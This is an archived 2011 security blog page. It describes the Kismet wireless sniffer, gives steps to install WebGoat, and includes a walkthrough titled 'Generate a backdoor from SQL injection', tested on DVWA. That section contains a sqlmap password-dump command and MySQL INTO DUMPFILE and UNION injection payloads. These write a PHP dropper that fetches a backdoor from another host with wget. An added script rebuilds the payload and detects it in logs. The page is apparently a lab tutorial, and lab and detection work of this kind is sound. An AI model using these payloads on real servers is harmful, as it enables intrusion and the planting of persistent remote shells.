Tuesday, November 1, 2011

Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet works with any wireless card that supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones, only one supported wireless adapter is available there as a packet source.


Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.
Kismet can log all sniffed packets and save them in a tcpdump/Wireshark- or AirSnort-compatible file format. Kismet also captures PPI headers.
Kismet can also detect default or "not configured" networks and probe requests, and determine what level of wireless encryption a given access point uses.
To find as many networks as possible, Kismet supports channel hopping: it constantly changes channel non-sequentially, in a user-defined sequence whose default leaves large gaps between consecutive channels (for example 1-6-11-2-7-12-3-8-13-4-9-14-5-10). Because adjacent 2.4 GHz channels overlap, jumping to a distant channel on every hop covers more of the band per dwell than stepping to the next channel would, so more packets are captured.
Kismet also supports logging the geographical coordinates of each network if input from a GPS receiver is available.
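The hop order and the overlap argument above, as an added example that is not part of the original post or of Kismet's own code: a stride-based generator reproduces the default 14-channel sequence, and an overlap count compares it with plain sequential hopping. Channel centre frequencies follow the standard 2.4 GHz plan; the 22 MHz signal width is an assumed value.

```python
"""Added example, not part of the original post or of Kismet itself: reproduces the
default hop order quoted above from a fixed stride and quantifies why it beats
sequential hopping. Channel centres follow the 2.4 GHz plan (2412 MHz for
channel 1, 5 MHz steps up to channel 13, channel 14 at 2484 MHz); a 22 MHz
signal width is assumed, so channels fewer than five apart overlap."""
import math

CHANNELS_2_4GHZ = list(range(1, 15))
SIGNAL_WIDTH_MHZ = 22  # assumed occupied width of a DSSS/OFDM signal


def centre_mhz(channel):
    """Centre frequency of a 2.4 GHz channel."""
    if channel == 14:
        return 2484
    return 2407 + 5 * channel


def overlaps(a, b, width_mhz=SIGNAL_WIDTH_MHZ):
    """True if the two channels' signals share spectrum."""
    return abs(centre_mhz(a) - centre_mhz(b)) < width_mhz


def hop_order(channels, stride=5):
    """Visit every channel once by stepping `stride` positions and wrapping round.
    The stride must be coprime with the list length or some channels are never visited."""
    n = len(channels)
    if math.gcd(stride, n) != 1:
        raise ValueError("stride %d does not cover all %d channels" % (stride, n))
    return [channels[(i * stride) % n] for i in range(n)]


def overlapping_hops(order):
    """Number of consecutive hops (cyclic) that land on overlapping channels,
    i.e. dwell time spent re-listening to spectrum that was just covered."""
    n = len(order)
    return sum(overlaps(order[i], order[(i + 1) % n]) for i in range(n))


if __name__ == "__main__":
    default = hop_order(CHANNELS_2_4GHZ)
    print("hop order:", "-".join(map(str, default)))
    print("overlapping hops, strided:   ", overlapping_hops(default))
    print("overlapping hops, sequential:", overlapping_hops(CHANNELS_2_4GHZ))
```

Run it to print the order and both counts: the strided order never hops between overlapping channels, while stepping 1-2-3-...-14 does so on 13 of 14 hops. A stride that shares a factor with the channel count (for example 7 on 14 channels) would skip channels, which is why the function refuses it.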

Sunday, October 30, 2011

How to install WebGoat in BackTrack

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

1. Before installing, first download WebGoat from this link.
2. To extract the 7zip archive, install p7zip:
    apt-get install p7zip
3. Now extract the WebGoat archive:
    p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z
4. When extraction has completed, change into the extracted folder:
    cd WebGoat-OWASP_Standard-5.3_RC1
5. Make webgoat.sh executable with this command:
    chmod +x webgoat.sh
6. WebGoat needs a Java runtime and JDK (openjdk-6-jre and openjdk-6-jdk), which can be installed with:
    apt-get install openjdk-6-jre openjdk-6-jdk
7. After installation WebGoat is ready to run on port 80 or 8080 with one of these commands:
    ./webgoat.sh start80 or ./webgoat.sh start8080


Now we can open WebGoat in the browser at this URL: http://127.0.0.1/webgoat/attack (if it was started on port 8080, use http://127.0.0.1:8080/webgoat/attack instead).

Generate a backdoor from SQL injection

To create a backdoor through SQL injection, the web application must be vulnerable to SQL injection, and the database account must be able to write files (in MySQL, the FILE privilege) into a directory the web server serves. First we need the MySQL credentials, which can be obtained by various techniques, such as social engineering or enumerating the password hashes with sqlmap, for example:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --passwords

Once we have recovered the password (sqlmap dumps the hashes and can run a dictionary attack against them), we connect to MySQL with the following syntax:

root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p 


then press Enter and type the password we obtained. This only works if the MySQL root account is permitted to connect from our host; by default root may only connect from localhost.
Now we are in the MySQL shell, and from here we can create databases or, as below, write a backdoor. The following statement writes a small PHP dropper into the web root that fetches the real backdoor from another web server. INTO DUMPFILE requires the FILE privilege, a target directory the MySQL server process can write to, and a target file that does not already exist; the <? short open tag also relies on short_open_tag being enabled in php.ini (<?php works regardless):

mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php';
Query OK, 1 row affected (0.00 sec)


Now we request bad.php in the browser; the PHP inside it executes, downloads the backdoor cn.txt into the dvwa directory and saves it as bar.php.
Finally, we can access bar.php at http://###.###.###.###/dvwa/bar.php

Another way:
Without database credentials, we can inject the same file write directly through the vulnerable parameter. The UNION must return the same number of columns as the original query (DVWA's returns two), and the closing quote of the file name is deliberately omitted because the application's own query supplies it:

 1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php

When we then access a.php, "wget 192.168.56.1/cn.txt -O bar.php" is executed and the backdoor is downloaded by the server.
(This example was tested on DVWA.)
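As an added example that is not part of the original post or of DVWA or sqlmap, the block below shows what the union payload turns into once DVWA concatenates it into its users query, and then runs a detector for the INTO DUMPFILE / INTO OUTFILE file write (the primitive behind both the manual and the injected variant above) over constructed Apache access-log and MySQL general-log lines. The query template is DVWA's SQLi lesson query; the IPs and paths mirror this page, but the log lines, timestamps and sizes are made up for the demonstration.

```python
"""Added example, not from the original post or from DVWA/sqlmap: the union payload
after DVWA concatenates it into its query, plus a log-side detector for the
INTO DUMPFILE / INTO OUTFILE write it relies on. All log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus, quote_plus

# DVWA's SQLi lesson builds this query by string concatenation. The leading '
# in the payload closes the opening quote; the application's own trailing '
# terminates the file name, which is why the payload on the page has no
# closing quote of its own.
QUERY_TEMPLATE = "SELECT first_name, last_name FROM users WHERE user_id = '{id}'"


def build_dumpfile_payload(dropper_url, dest_path, shell_name="bar.php"):
    """The page's union payload, parameterised on staging URL and target path.
    Assumes the original query returns two columns, as DVWA's does."""
    php = "<? system('wget %s -O %s'); ?>" % (dropper_url, shell_name)
    return "1' union select 1,\"%s\" into dumpfile '%s" % (php, dest_path)


def render_query(user_input):
    """What MySQL receives when the value is concatenated in unsanitised."""
    return QUERY_TEMPLATE.format(id=user_input)


# --- detection -------------------------------------------------------------
FILE_WRITE = re.compile(r"\binto\s+(?:dump|out)file\b", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def strip_comments(sql):
    """Remove /* */ comments, which attackers use to split keywords (into/**/dumpfile)."""
    return re.sub(r"/\*.*?\*/", " ", sql, flags=re.DOTALL)


def normalise(value):
    """Undo one extra layer of URL encoding (double-encoded payloads), then strip comments."""
    return strip_comments(unquote_plus(value))


def flag_requests(access_log_lines):
    """(line_no, decoded_value) for every query parameter carrying a file write."""
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for values in params.values():
            for v in values:
                decoded = normalise(v)
                if FILE_WRITE.search(decoded):
                    hits.append((n, decoded))
    return hits


def flag_queries(general_log_lines):
    """MySQL general-log lines whose statement contains a file write."""
    return [l for l in general_log_lines if FILE_WRITE.search(strip_comments(l))]


# Constructed samples: IPs and paths mirror the page, everything else is made up.
PAYLOAD = build_dumpfile_payload("192.168.56.1/cn.txt", "/opt/lampp/htdocs/dvwa/a.php")
ACCESS_LOG = [
    '192.168.56.1 - - [30/Oct/2011:10:01:12 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521',
    '192.168.56.1 - - [30/Oct/2011:10:02:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit HTTP/1.1" 200 4560'
    % quote_plus(PAYLOAD),
    '192.168.56.1 - - [30/Oct/2011:10:02:45 +0000] "GET /dvwa/a.php HTTP/1.1" 200 0',
    '192.168.56.1 - - [30/Oct/2011:10:02:46 +0000] "GET /dvwa/bar.php HTTP/1.1" 200 812',
    # double-encoded, comment-split variant of the same write
    '10.0.0.5 - - [30/Oct/2011:10:05:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%2527%2520union%2520select%25201%252C2%2520into%252F%252A%252A%252Foutfile%2520%2527%252Ftmp%252Fx%2527&Submit=Submit HTTP/1.1" 200 10',
]
GENERAL_LOG = [
    "111030 10:01:12\t    7 Query\t" + render_query("1"),
    "111030 10:02:40\t    7 Query\t" + render_query(PAYLOAD),
]

if __name__ == "__main__":
    print(render_query(PAYLOAD))
    for n, v in flag_requests(ACCESS_LOG):
        print("access log line %d: %s" % (n, v))
    for q in flag_queries(GENERAL_LOG):
        print("general log:", q)
```

The detector decodes parameters a second time and strips inline comments before matching, since into/**/dumpfile or a double-encoded payload slips past a literal keyword match; the fetches of a.php and bar.php right after the injection are the follow-on tell worth correlating. On the defensive side the same primitive is shut off by revoking FILE from the application's database account, restricting secure_file_priv in my.cnf to a directory outside the web root, and keeping the document root unwritable by the mysqld user.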